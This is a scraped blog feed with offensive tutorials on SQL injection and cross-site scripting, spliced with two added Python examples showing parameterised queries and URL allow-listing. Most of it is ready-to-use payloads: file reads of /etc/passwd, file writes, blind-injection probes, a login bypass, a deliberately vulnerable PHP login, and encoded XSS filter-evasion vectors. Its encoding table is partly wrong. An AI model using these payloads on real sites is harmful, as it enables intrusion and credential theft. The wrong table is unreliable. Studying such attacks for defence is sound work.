is needed for the output file, which cannot be an existing file, though unlike load_file() the char() function does not fix magic_quotes. Time for an example of both; here is the situation: the vulnerable site has 1 column selected and also has a "users" table. load_file, no magic_quotes: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;  &lt;a href="http://www.site.com/vulnerable.php?id=-1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=-1&lt;/a&gt; union all select load_file('/etc/passwd')-- &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
load_file with magic_quotes: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;  &lt;a href="http://www.site.com/vulnerable.php?id=-1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=-1&lt;/a&gt; union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))-- &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
INTO OUTFILE: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;  &lt;a href="http://www.site.com/vulnerable.php?id=-1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=-1&lt;/a&gt; union all select "test" INTO OUTFILE "/etc/test" from users-- &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x09 - Blind SQL Injection&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;Blind SQL injection occurs when the original select query obtains column information but does not display it onto the screen. In order to continue through a blind SQL injection you must basically brute-force any value you want to know. There are a few functions we can use in conjunction with each other that make this quite easy yet tedious, those would be the mid() and the ascii() functions. mid() is MySQL's substring function and ascii() does the exact opposite of char(): it takes a character and exchanges it with the corresponding ASCII numeric value. Doing this allows us to determine the range each of our desired values is in on the ASCII chart, thus narrowing each down until we find a match. Example situation: we have found a site that is vulnerable to blind SQL injection and we want to figure out which user MySQL is currently running as; our injection sequence could look something like: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; &lt;a href="http://www.site.com/vulnerable.php?id=1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=1&lt;/a&gt; and ascii(mid(user(),1,1)) &amp;lt; 97-- &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
(this will tell us if the first letter in the user is above/below "a"  then we can change the 97 to a different value until we find the  character to the first letter) &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; &lt;a href="http://www.site.com/vulnerable.php?id=1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=1&lt;/a&gt; and ascii(mid(user(),2,1)) &amp;lt; 97--  &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
(just repeat as before and keep incrementing through the letters and you will eventually have the current user)    &lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x10 - Login Bypass&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;Ok, I left this for towards the end because it is not really very common anymore but I will throw it in because I suppose you may run across it some day (I have only run across this vulnerability once in the real world). The concept behind the SQL login bypass is quite simple; in order to execute the exploit you input a username into the user field then in the password field of the form you put: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;' or 1=1--&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
this just ends the current password field and includes the logical OR with a constant true statement. A  simple MySQL login script could look like: &lt;br /&gt;
&lt;code&gt;
&amp;lt;?php
// Deliberately vulnerable login script: user input goes straight into the query.
$user = $_POST['user'];
$pass = $_POST['pass'];
$ref = $_SERVER['HTTP_REFERER'];

if((!$user) or (!$pass))
{
  header("Location:$ref");
  exit();
}

$conn = @mysql_connect("localhost", "root", "blah") or die("Could not connect");
$rs = @mysql_select_db("db", $conn) or die("db error");

// $user and $pass land inside the double-quoted SQL string literals unescaped.
$sql = "SELECT * FROM users WHERE user=\"$user\" AND pass=\"$pass\"";
$rs = mysql_query($sql, $conn) or die("query error");

// Any returned row counts as a successful login.
$num = mysql_numrows($rs);
if($num != 0)
{
  echo("Welcome $user");
}
else
{
  header("Location:$ref");
  exit();
}
?&amp;gt;
&lt;/code&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
so if we input the user "admin" and "" or 1=1--" as the password the query sent to the server is going to look like this: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; "SELECT * FROM users WHERE user="admin" AND pass="" or 1=1--" &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
So the server is going to select the row where the "user" equals "admin" and disregard whether the "pass" is correct, because it is asking if the pass OR 1=1 is true; since 1=1 is always true you bypass the pass section. &lt;br /&gt;
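The login query above and the quote-free char() payload from section 0x07, run against string-built SQL and against bound parameters; this is an added example, not code from the original post. It uses Python's sqlite3 in place of PHP/MySQL so that it runs offline, and the table contents, the function names and the single-quoted form of the login query are assumptions made for the illustration.

```python
import sqlite3

# Constructed sample data, not taken from the post.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE users (user TEXT, pass TEXT);
INSERT INTO articles VALUES (1, 'hello world');
INSERT INTO users VALUES ('admin', 'constructed-secret');
"""

# Payloads quoted from the post: the text after "id=" and the password field.
UNION_PAYLOAD = ("-1 union all select pass from users "
                 "where user=char(97,100,109,105,110)--")
LOGIN_PAYLOAD = "' or 1=1--"


def make_db():
    """Build a throwaway in-memory database with the sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def add_slashes(value):
    """Rough stand-in for magic_quotes: backslash-escape quotes and backslashes."""
    for ch in ("\\", "'", '"'):
        value = value.replace(ch, "\\" + ch)
    return value


def article_concat(db, raw_id):
    """Vulnerable: the id is pasted into the SQL text, even after escaping.
    The payload contains no quotes, so the escaping never touches it."""
    sql = "SELECT title FROM articles WHERE id=" + add_slashes(raw_id)
    return [row[0] for row in db.execute(sql)]


def article_bound(db, raw_id):
    """Hardened: the id travels as a bound value and is never parsed as SQL."""
    sql = "SELECT title FROM articles WHERE id=?"
    return [row[0] for row in db.execute(sql, (raw_id,))]


def login_concat(db, user, password):
    """Vulnerable: same shape as the PHP script, built by concatenation."""
    sql = ("SELECT * FROM users WHERE user='" + user +
           "' AND pass='" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_bound(db, user, password):
    """Hardened: placeholders keep the quote in the password as plain data.
    A real application would also store a password hash, not the password."""
    sql = "SELECT * FROM users WHERE user=? AND pass=?"
    return db.execute(sql, (user, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("escaping changed payload:", add_slashes(UNION_PAYLOAD) != UNION_PAYLOAD)
    print("concat lookup:", article_concat(db, UNION_PAYLOAD))
    print("bound lookup :", article_bound(db, UNION_PAYLOAD))
    print("concat login :", login_concat(db, "admin", LOGIN_PAYLOAD))
    print("bound login  :", login_bound(db, "admin", LOGIN_PAYLOAD))
```

Escaping quotes does nothing for a numeric parameter, which is why the fix is binding every value and not filtering characters.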
&lt;div class="gradient1"&gt;&lt;h2&gt;0x11 - Useful Keywords/Functions&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;&lt;br /&gt;
&lt;code&gt; UNION ALL SELECT AND/OR ORDER BY WHERE LIMIT LIKE INTO OUTFILE char() ascii() mid() concat() group_concat() load_file() user() database() version() &lt;/code&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/2736971915398911239/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/complete-guide-to-sql-injections.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/2736971915398911239?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/2736971915398911239?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/complete-guide-to-sql-injections.html" title="The Complete Guide to SQL Injections" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DEINSXo7eCp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-7358045905646302737</id><published>2011-09-10T23:13:00.000+05:30</published><updated>2011-09-10T23:13:18.400+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:13:18.400+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web security" /><title>The Complete Guide to XSS</title><content type="html">&lt;div class="gradient1"&gt; &lt;h2&gt;What is Cross Site Scripting?&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;Cross-site scripting (XSS)is a type of computer security vulnerability  typically found in web applications which allow code injection by  malicious web users into the web pages viewed by other users. 
Cross-site  scripting holes in general can be seen as vulnerabilities which allow  attackers to bypass security mechanisms. By finding clever ways of  injecting malicious scripts into web pages an attacker can gain elevated  access privileges to sensitive page content, session cookies, and a  variety of other objects.&lt;br /&gt;
&lt;br /&gt;
There are three distinct types of XSS vulnerabilities:&lt;br /&gt;
&lt;strong&gt;non-persistent&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;persistent&lt;/strong&gt;&lt;br /&gt;
and &lt;strong&gt;DOM-based&lt;/strong&gt; (which can be either persistent or non-persistent).&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Non-persistent&lt;/strong&gt; cross-site scripting hole is also  referred to as a reflected vulnerability, and is by far the most common  type. These holes show up when data provided by a web client is used  immediately by server-side scripts to generate a page of results for  that user. A classic example of this is in site search engines: if one  searches for a string which includes some HTML special characters, often  the search string will be redisplayed on the result page to indicate  what was searched for, or will at least include the search terms in the  text box for easier editing. If any occurrence of the search terms is  not HTML entity encoded, an XSS hole will result.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Persistent&lt;/strong&gt; XSS vulnerability is also referred to as a  stored or second-order vulnerability, and it allows the most powerful  kinds of attacks. A type 2 XSS vulnerability exists when data provided  to a web application by a user is first stored persistently on the  server (in a database, file system, or other location), and later  displayed to users in a web page without being encoded using HTML  entities. A classic example of this is with online message boards, where  users are allowed to post.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;DOM-based&lt;/strong&gt; XSS vulnerability, also referred to as local  cross-site scripting, is based on the standard object model for  representing HTML or XML called the Document Object Model or DOM for  short. With DOM-based cross-site scripting vulnerabilities, the problem  exists within a page's client-side script itself. For instance, if a  piece of JavaScript accesses a URL request parameter and uses this  information to write some HTML to its own page, and this information is  not encoded using HTML entities, an XSS hole will likely be present,  since this written data will be re-interpreted by browsers as HTML which  could include additional client-side scripts.    &lt;br /&gt;
&lt;div class="gradient1"&gt; &lt;h2&gt;Finding XSS Vulnerabilities&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;The most commonly used XSS injection test is: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;&amp;lt;script&amp;gt;alert("XSS")&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
When this example is injected into an input box or a URL parameter, it  will either fire or it will fail. If the injection fails, it doesn't  mean the site is secure, it just means you need to look deeper.    &lt;br /&gt;
&lt;div class="gradient1"&gt; &lt;h2&gt;XSS Filter Evasion&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;&lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Escaping From Strings&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;The first step is to view source on the Web page and see if you can find the injected string in the HTML. There are several places you may find it completely intact, yet hidden from the casual observer. The first is within an input parameter: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;INPUT type="text" value='&amp;lt;SCRIPT&amp;gt;alert("XSS")&amp;lt;/SCRIPT&amp;gt;'&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
In this example we could alter our input to include two characters that allow the injected code to jump out of the single quotes:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert("XSS")&amp;lt;/SCRIPT&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Now our code renders because we have ended the input encapsulation and HTML tag before our vector, which allows it to fire. However, in this case, the extraneous single quote and closed angle bracket are displayed on the Web page. This can be suppressed if we update our vector into the following: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert("XSS")&amp;lt;/SCRIPT&amp;gt;&amp;lt;xss a='&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
This turns the code output into:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;INPUT type="text" value=''&amp;gt;&amp;lt;SCRIPT&amp;gt;alert("XSS")&amp;lt;/SCRIPT&amp;gt;&amp;lt;xss a=''&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
As a result, the JavaScript code is injected with no visible indication of its existence. The &amp;lt;xss a=''&amp;gt; tag does not render, because it is not valid. &lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Working Around Filtered Quotes&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;Let's use the same example above, but assume the Webmaster included code to put slashes in front of any single quotes or double quotes (i.e., addslashes()). Our previous vector without the last part would now turn into: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;INPUT type="text" value='\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\")&amp;lt;/SCRIPT&amp;gt;'&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
There are several methods to try and work around this; it all depends on the filtering in place. One method is to use Character Entities. Some characters are reserved in HTML. For example, you cannot use the greater than or less than signs within your text because the browser could mistake them for markup. If we want the browser to actually display these characters we must insert character entities in the HTML source. &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt; &lt;td&gt; &amp;amp;#34; &lt;/td&gt; &lt;td&gt; &amp;amp;quot; &lt;/td&gt; &lt;td&gt; " &lt;/td&gt; &lt;td&gt; quotation mark, apl quote &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt; &amp;amp;#38; &lt;/td&gt; &lt;td&gt; &amp;amp;amp; &lt;/td&gt; &lt;td&gt; &amp;amp; &lt;/td&gt; &lt;td&gt; ampersand &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt; &amp;amp;#60; &lt;/td&gt; &lt;td&gt; &amp;amp;lt; &lt;/td&gt; &lt;td&gt; &amp;lt;  &lt;/td&gt; &lt;td&gt; less-than sign &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt; &amp;amp;#62; &lt;/td&gt; &lt;td&gt; &amp;amp;gt; &lt;/td&gt; &lt;td&gt; &amp;gt;  &lt;/td&gt; &lt;td&gt; greater-than sign &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Using the code &lt;span&gt;(&amp;amp;quot;) or (&amp;amp;#34;)&lt;/span&gt; in place of our quotes is one method to try and work around quote filtering.  Example:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;script&amp;gt;alert("XSS")&amp;lt;/script&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;script&amp;gt;alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;lt;/script&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;script&amp;gt;alert(&amp;amp;#34;XSS&amp;amp;#34;)&amp;lt;/script&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
If no quotes of any kind are allowed you can use fromCharCode in JavaScript to create any XSS code you need. The fromCharCode() takes the specified Unicode values and returns a string.  Example:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;script&amp;gt;alert("XSS")&amp;lt;/script&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;script&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/script&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &amp;lt;INPUT type="text" value='\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;'&amp;gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Working Around &amp;lt;SCRIPT&amp;gt; Filtering&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;Some filters will filter out &amp;lt;script&amp;gt; making it impossible for any  of the above examples to work. However, there are many other ways to  insert JavaScript into a Web page. Let's look at an example of an event  handler:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;BODY onload="alert('XSS')"&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
The "onload" keyword inside HTML represents an event handler. It doesn't work with all HTML tags, but it is particularly effective inside BODY tags. That said, there are instances where this approach will fail, such as when the BODY onload event handler is previously overloaded higher on the page before your vector shows up. Another useful example is the onerror handler: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC="" onerror="alert('XSS')"&amp;gt; &lt;/code&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Because the image is poorly defined, the onerror event handler fires causing the JavaScript inside it to render, all without ever calling a &amp;lt;script&amp;gt; tag.    &lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Using IMG SRC&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;The two most commonly permitted HTML tags are &amp;lt;A HREF, which is used for embedded links, and &amp;lt;IMG, which is used to embed images. Of these two, the most dangerous is the IMG tag. The following illustrates some examples of why this tag is problematic: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC="nojavascript...alert('XSS');"&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
No quotes and no semicolon:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC=nojavascript...alert('XSS')&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Filtering quotes and script:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC=nojavascript...alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Using CharCode to work around filtering quotes:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC=nojavascript...alert(String.fromCharCode(88,83,83))&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
A simple attack vector, like the one above, can be even further obfuscated by transforming the entire string into the decimal equivalent of the ASCII characters:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG  SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101; &amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Using the ASCII table you can decipher this example, and then use the  same method of obfuscation to create your own injectable string. The same can be done for hexadecimal:  &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC=&amp;amp;#x6A;&amp;amp;#x61;&amp;amp;#x76;&amp;amp;#x61;&amp;amp;#x73;&amp;amp;#x63;&amp;amp;#x72;&amp;amp;#x69;&amp;amp;#x70;&amp;amp;#x74;&amp;amp;#x3A;&amp;amp;#x61;&amp;amp;#x6C;&amp;amp; #x65;&amp;amp;#x72;&amp;amp;#x74;&amp;amp;#x28;&amp;amp;#x27;&amp;amp;#x58;&amp;amp;#x53;&amp;amp;#x53;&amp;amp;#x27;&amp;amp;#x29;&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
While the javascript: directive syntax inside images has been deprecated since IE 7.0, it still works in IE 6.0, Opera 9.0, and Netscape 8.0 (when in the IE rendering engine, although it has also been deprecated as of 8.1). &lt;br /&gt;
&lt;div class="gradient6"&gt; &lt;h3&gt;&lt;u&gt;Using Tab, New Line, and Carriage Return&lt;/u&gt;&lt;/h3&gt;&lt;/div&gt;Tab, new line and carriage return characters can also be used to trick XSS filters.   &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&amp;lt;IMG SRC="jav&amp;amp;#x9ascript:alert('XSS');"&amp;gt;&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
The example above uses a tab Minimum Sized Decimal to break up the word javascript, in turn breaking up the XSS and tricking the filter. The output above will look as follows: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt; &lt;code&gt;&lt;/code&gt;&amp;lt;IMG SRC="jav&lt;br /&gt;
ascript:alert('XSS');"&amp;gt;&lt;br /&gt;
&lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt; &lt;td&gt; &lt;/td&gt; &lt;td&gt; Horizontal Tab    &lt;/td&gt; &lt;td&gt; New line &lt;/td&gt; &lt;td&gt; Carriage Return &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt; URL  &lt;/td&gt; &lt;td&gt; %09 &lt;/td&gt; &lt;td&gt; %10  &lt;/td&gt; &lt;td&gt; %13 &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt; Minimal Sized Hex   &lt;/td&gt; &lt;td&gt; &amp;amp;#x9  &lt;/td&gt; &lt;td&gt; &amp;amp;#xA  &lt;/td&gt; &lt;td&gt; &amp;amp;#xD &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt; Maximum Sized Hex   &lt;/td&gt; &lt;td&gt;  &amp;amp;#x0000009;  &lt;/td&gt; &lt;td&gt;  &amp;amp;#x000000A;   &lt;/td&gt; &lt;td&gt;  &amp;amp;#x000000D;  &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt; Minimum Sized Decimal   &lt;/td&gt; &lt;td&gt;  &amp;amp;#9    &lt;/td&gt; &lt;td&gt;   &amp;amp;#10   &lt;/td&gt; &lt;td&gt;    &amp;amp;#13     &lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td&gt; Maximum Sized Decimal    &lt;/td&gt; &lt;td&gt;    &amp;amp;#x0000009;    &lt;/td&gt; &lt;td&gt;  &amp;amp;#x0000009;     &lt;/td&gt; &lt;td&gt;  &amp;amp;#0000009;    &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
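Why a filter that looks for the literal text "javascript:" misses the entity-encoded and tab-split SRC values shown above, and what a server-side check has to do first; this is an added example, not code from the original post. The function names and the http/https allow-list are assumptions, and the ampersand in the sample value is written as \x26.

```python
import html
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # assumption: schemes an IMG SRC may use

# Sample inputs. "\x26" is the ampersand that starts a character reference.
# DECIMAL_SRC is the decimal-encoded SRC value from the post;
# TAB_SRC is the tab-split value as it looks once the tab is in place.
DECIMAL_SRC = ("\x26#106;\x26#97;\x26#118;\x26#97;\x26#115;\x26#99;"
               "\x26#114;\x26#105;\x26#112;\x26#116;\x26#58;"
               "\x26#97;\x26#108;\x26#101;\x26#114;\x26#116;"
               "\x26#40;\x26#39;\x26#88;\x26#83;\x26#83;\x26#39;\x26#41;")
TAB_SRC = "jav\tascript:alert('XSS');"


def blacklist_accepts(src):
    """The kind of filter the post defeats: search the raw text for the directive."""
    return "javascript:" not in src.lower()


def normalise(src):
    """Decode and clean the value the way a browser does before reading the scheme."""
    decoded = html.unescape(src)                  # numeric and named references
    decoded = re.sub(r"[\t\n\r]", "", decoded)    # tab, LF and CR are dropped anywhere
    controls = "".join(chr(c) for c in range(0x21))
    return decoded.strip(controls)                # leading/trailing controls and space


def allowlist_accepts(src):
    """Accept only relative URLs and allow-listed schemes, after normalising."""
    cleaned = normalise(src)
    if any(ord(ch) in range(0x20) for ch in cleaned):
        return False                              # embedded NUL or other control char
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return False                              # unparseable URL: reject
    return scheme == "" or scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    for name, value in (("decimal", DECIMAL_SRC), ("tab", TAB_SRC),
                        ("relative", "images/logo.png")):
        print(name, "blacklist:", blacklist_accepts(value),
              "allow-list:", allowlist_accepts(value))
```

The allow-list decision is made on the decoded value, so the same check covers the hexadecimal form and mixed-case spellings without a rule for each.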
&lt;br /&gt;
